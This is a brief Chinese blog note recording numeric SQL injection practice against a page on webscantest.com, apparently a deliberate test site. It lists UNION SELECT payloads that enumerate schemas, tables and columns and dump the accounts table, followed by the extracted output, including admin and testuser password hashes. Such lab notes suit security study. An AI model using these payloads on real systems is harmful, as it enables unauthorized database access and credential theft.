http://www.webscantest.com/datastore/search_by_id.php

記錄一下

數(shù)字型注入

1 or 1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

1 or 1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

1 or 1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='accounts'

1 or 1 union select 1,group_concat(uname,0x3a,passwd),3,4 from accounts

user() = webscantest@localhost
database() = webscantest
tables = accounts,inventory,orders,products
column_name = id,uname,passwd,fname,lname

admin:21232f297a57a5a743894a0e4a801fc3,testuser:179ad45c6ce2cb97cf1029e212046e81

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • web應(yīng)用程序會(huì)對(duì)用戶的輸入進(jìn)行驗(yàn)證,過濾其中的一些關(guān)鍵字,這種過濾我們可以試著用下面的方法避開。 1、 不使用被...
    查無此人asdasd閱讀 7,659評(píng)論 0 5
  • rljs by sennchi Timeline of History Part One The Cognitiv...
    sennchi閱讀 7,864評(píng)論 0 10
  • Sql注入定義: 就是通過把sql命令插入到web表單提交或輸入域名或頁面請(qǐng)求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行...
    付出從未后悔閱讀 757評(píng)論 0 3
  • 年 越來越近。 心, 茫然不安。 一年又一年, 從指尖悄然流失, 增長的只有年齡。 不知從何時(shí)開始, 過年, 不在...
    夕容在后院種地瓜閱讀 242評(píng)論 0 0
  • 強(qiáng)忍著不跟你聯(lián)絡(luò),卻被你寥寥幾句給打敗。 你說你害怕我們的關(guān)系會(huì)變淡,你說是你沒有安全感,所以覺得我們疏遠(yuǎn)了。 從...
    凜冬將至L閱讀 255評(píng)論 0 0

友情鏈接更多精彩內(nèi)容